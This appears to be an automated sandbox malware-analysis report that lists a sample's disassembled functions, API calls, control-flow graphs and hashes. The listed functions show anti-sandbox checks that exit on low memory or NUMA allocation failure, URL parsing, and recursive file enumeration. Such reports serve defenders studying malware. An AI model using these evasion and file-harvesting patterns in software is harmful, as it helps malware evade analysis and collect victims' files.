                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                            • String ID: :\$C
                            • API String ID: 2572753744-3309953409
                            • Opcode ID: d38f1eee9b5fd78c85fcda16ad5ee2259c11064d062441afefbc2b861d23129a
                            • Instruction ID: 21417c50a8b0c2b0272ece010d9a0bbec14d408e9354ed01752b1859c2722690
                            • Opcode Fuzzy Hash: d38f1eee9b5fd78c85fcda16ad5ee2259c11064d062441afefbc2b861d23129a
                            • Instruction Fuzzy Hash: 8D3161B1908219ABCB14CFB899859EFFFBCEF58710F100169E509F7650E6349B408BB1

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2793 b04bc0-b04bce 2794 b04bd0-b04bd5 2793->2794 2794->2794 2795 b04bd7-b04c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call b02a20 2794->2795
                            APIs
                            • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00B04BF7
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04C01
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04C0B
                            • lstrlen.KERNEL32(?,00000000,?), ref: 00B04C1F
                            • InternetCrackUrlA.WININET(?,00000000), ref: 00B04C27
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ??2@$CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1683549937-4251816714
                            • Opcode ID: 2d99ea460433aaa5ec985a1176ab342e8172825906669649ac3aa3cba9c22137
                            • Instruction ID: a334544a6a0e7893bb94e099501babdc5e461cfa6d303eb0dd459a870dc6da5d
                            • Opcode Fuzzy Hash: 2d99ea460433aaa5ec985a1176ab342e8172825906669649ac3aa3cba9c22137
                            • Instruction Fuzzy Hash: 6E011B71D00218ABDB10DFA8E845B9EBBA8EB48320F004166F914E7390EF7459058FD4

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2798 b01030-b01055 GetCurrentProcess VirtualAllocExNuma 2799 b01057-b01058 ExitProcess 2798->2799 2800 b0105e-b0107b VirtualAlloc 2798->2800 2801 b01082-b01088 2800->2801 2802 b0107d-b01080 2800->2802 2803 b010b1-b010b6 2801->2803 2804 b0108a-b010ab VirtualFree 2801->2804 2802->2801 2804->2803
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B01046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00B0104D
                            • ExitProcess.KERNEL32 ref: 00B01058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00B0106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00B010AB
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: f9682dd2527648314e9dbea5c5b0748ae654715fca133836b58ceac4787f0930
                            • Instruction ID: d2feed88acc8bc58e364fd8aabc7a5d2468273b39c43dab4f6ddd4efaaadeb41
                            • Opcode Fuzzy Hash: f9682dd2527648314e9dbea5c5b0748ae654715fca133836b58ceac4787f0930
                            • Instruction Fuzzy Hash: 7201F4717403047BE7284B696C6AF6BBBEDE784B11F208414F744E73C0E9B1EA008674

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2805 b1ee90-b1eeb5 call b02930 2808 b1eeb7-b1eebf 2805->2808 2809 b1eec9-b1eecd call b06c40 2805->2809 2808->2809 2811 b1eec1-b1eec3 lstrcpy 2808->2811 2812 b1eed2-b1eee8 StrCmpCA 2809->2812 2811->2809 2813 b1ef11-b1ef18 call b02a20 2812->2813 2814 b1eeea-b1ef02 call b02a20 call b02930 2812->2814 2820 b1ef20-b1ef28 2813->2820 2823 b1ef45-b1efa0 call b02a20 * 10 2814->2823 2824 b1ef04-b1ef0c 2814->2824 2820->2820 2822 b1ef2a-b1ef37 call b02930 2820->2822 2822->2823 2829 b1ef39 2822->2829 2824->2823 2827 b1ef0e-b1ef0f 2824->2827 2831 b1ef3e-b1ef3f lstrcpy 2827->2831 2829->2831 2831->2823
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1EEC3
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00B1EEDE
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 00B1EF3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: ERROR
                            • API String ID: 3722407311-2861137601
                            • Opcode ID: 27be6e014d36781ebf6de8d97c19c12963b02c5b5d9a35ffd76fee4b15ca918d
                            • Instruction ID: 89e163d527f4949940f4511b9030a58e1b7f50f574c2c138c385ca11519d532b
                            • Opcode Fuzzy Hash: 27be6e014d36781ebf6de8d97c19c12963b02c5b5d9a35ffd76fee4b15ca918d
                            • Instruction Fuzzy Hash: 382101317202069BDB21FF78DC4AA9A7BE4AF10300F4454B4BC5ADB292DE30E8598790

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2886 b010c0-b010cb 2887 b010d0-b010dc 2886->2887 2889 b010de-b010f3 GlobalMemoryStatusEx 2887->2889 2890 b01112-b01114 ExitProcess 2889->2890 2891 b010f5-b01106 2889->2891 2892 b01108 2891->2892 2893 b0111a-b0111d 2891->2893 2892->2890 2894 b0110a-b01110 2892->2894 2894->2890 2894->2893
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: 87a94ee9756eed2b62c83d5ed4ad36c250170a929cb641aefb3ab8ed971af04a
                            • Instruction ID: c9adcb9ac6ff4bb20b230dba4fac74447c17b0afc475bf1dd044eea5f392f551
                            • Opcode Fuzzy Hash: 87a94ee9756eed2b62c83d5ed4ad36c250170a929cb641aefb3ab8ed971af04a
                            • Instruction Fuzzy Hash: F2F082701182455BEB1C6A6C985A729FFD8EB01350F104DA9EEDAD22E1F670C8409167

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2895 b18c88-b18cc4 StrCmpCA 2897 b18cc6-b18cc7 ExitProcess 2895->2897 2898 b18ccd-b18ce6 2895->2898 2900 b18ee2-b18eef call b02a20 2898->2900 2901 b18cec-b18cf1 2898->2901 2903 b18cf6-b18cf9 2901->2903 2905 b18ec3-b18edc 2903->2905 2906 b18cff 2903->2906 2905->2900 2944 b18cf3 2905->2944 2907 b18d30-b18d3f lstrlen 2906->2907 2908 b18e56-b18e64 StrCmpCA 2906->2908 2909 b18d5a-b18d69 lstrlen 2906->2909 2910 b18dbd-b18dcb StrCmpCA 2906->2910 2911 b18ddd-b18deb StrCmpCA 2906->2911 2912 b18dfd-b18e0b StrCmpCA 2906->2912 2913 b18e1d-b18e2b StrCmpCA 2906->2913 2914 b18e3d-b18e4b StrCmpCA 2906->2914 2915 b18d84-b18d92 StrCmpCA 2906->2915 2916 b18da4-b18db8 StrCmpCA 2906->2916 2917 b18d06-b18d15 lstrlen 2906->2917 2918 b18e88-b18e9a lstrlen 2906->2918 2919 b18e6f-b18e7d StrCmpCA 2906->2919 2923 b18d41-b18d46 call b02a20 2907->2923 2924 b18d49-b18d55 call b02930 2907->2924 2908->2905 2936 b18e66-b18e6d 2908->2936 2925 b18d73-b18d7f call b02930 2909->2925 2926 b18d6b-b18d70 call b02a20 2909->2926 2910->2905 2929 b18dd1-b18dd8 2910->2929 2911->2905 2930 b18df1-b18df8 2911->2930 2912->2905 2931 b18e11-b18e18 2912->2931 2913->2905 2932 b18e31-b18e38 2913->2932 2914->2905 2933 b18e4d-b18e54 2914->2933 2915->2905 2928 b18d98-b18d9f 2915->2928 2916->2905 2934 b18d17-b18d1c call b02a20 2917->2934 2935 b18d1f-b18d2b call b02930 2917->2935 2921 b18ea4-b18eb0 call b02930 2918->2921 2922 b18e9c-b18ea1 call b02a20 2918->2922 2919->2905 2920 b18e7f-b18e86 2919->2920 2920->2905 2954 b18eb3-b18eb5 2921->2954 2922->2921 2923->2924 2924->2954 2925->2954 2926->2925 2928->2905 2929->2905 2930->2905 2931->2905 2932->2905 2933->2905 2934->2935 2935->2954 2936->2905 2944->2903 2954->2905 2955 b18eb7-b18eb9 2954->2955 2955->2905 2956 b18ebb-b18ebd lstrcpy 2955->2956 2956->2905
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 3e2168c608d702cd45b9def3b925c635478d34c6585dd777220d5d14a3b0e626
                            • Instruction ID: 20453127e6582eaa66e8be78f51cb2230d66e73eaee5acf0e2108d00c98352b3
                            • Opcode Fuzzy Hash: 3e2168c608d702cd45b9def3b925c635478d34c6585dd777220d5d14a3b0e626
                            • Instruction Fuzzy Hash: 1CE0D861500364EBCB04ABA49C98986BB68FF00318B1040ACE900AB251D770AC05CF69
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B01046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00B0104D
                            • ExitProcess.KERNEL32 ref: 00B01058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00B0106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00B010AB
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: 130030239f1aa8b517d6ebaf344cf9ccae225ec8663210e0cbe776ab3c0790b7
                            • Instruction ID: 3899fa6cae99427ac5ddfba5a8d1fecb14443b416080a1082903276bc5bc1240
                            • Opcode Fuzzy Hash: 130030239f1aa8b517d6ebaf344cf9ccae225ec8663210e0cbe776ab3c0790b7
                            • Instruction Fuzzy Hash: 38E0C7B46883813EF7240B61AC5FF02BF2CAB12B09F000040F300FA2C2E9E1AA008678
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B123D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B123F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B12402
                            • lstrlen.KERNEL32(\*.*), ref: 00B1240D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1242A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00B12436
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1246A
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B12486
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: 6e48e282afcb72fe9d7acea87c3cf8001018b1bee9fb77e9dd106b05aa41c550
                            • Instruction ID: 4a7402bddb8f831c82342bec7ec578dfa8eafd05282a29fc6b6f2df2b00429b7
                            • Opcode Fuzzy Hash: 6e48e282afcb72fe9d7acea87c3cf8001018b1bee9fb77e9dd106b05aa41c550
                            • Instruction Fuzzy Hash: 6CA28171A117169BCB21AF78DC89AAEBBF9EF44700F4440A4F805E7391DB74DD498BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B016E2
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B01719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0176C
                            • lstrcat.KERNEL32(00000000), ref: 00B01776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B017A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B017EF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B017F9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01825
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01875
                            • lstrcat.KERNEL32(00000000), ref: 00B0187F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B018AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B018F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B018FE
                            • lstrlen.KERNEL32(00B31794), ref: 00B01909
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01929
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B01935
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0195B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01966
                            • lstrlen.KERNEL32(\*.*), ref: 00B01971
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0198E
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00B0199A
                              • Part of subcall function 00B24040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 00B2406D
                              • Part of subcall function 00B24040: lstrcpy.KERNEL32(00000000,?), ref: 00B240A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B019C3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01A0E
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01A16
                            • lstrlen.KERNEL32(00B31794), ref: 00B01A21
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01A41
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B01A4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01A76
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01A81
                            • lstrlen.KERNEL32(00B31794), ref: 00B01A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01AAC
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B01AB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01ADE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01AE9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01B11
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B01B45
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B01B70
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B01B8A
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B01BC4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01BFB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01C03
                            • lstrlen.KERNEL32(00B31794), ref: 00B01C0E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01C31
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B01C3D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01C69
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01C74
                            • lstrlen.KERNEL32(00B31794), ref: 00B01C7F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01CA2
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B01CAE
                            • lstrlen.KERNEL32(?), ref: 00B01CBB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01CDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00B01CE9
                            • lstrlen.KERNEL32(00B31794), ref: 00B01CF4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01D14
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B01D20
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01D46
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01D51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01D7D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01DE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01DEB
                            • lstrlen.KERNEL32(00B31794), ref: 00B01DF6
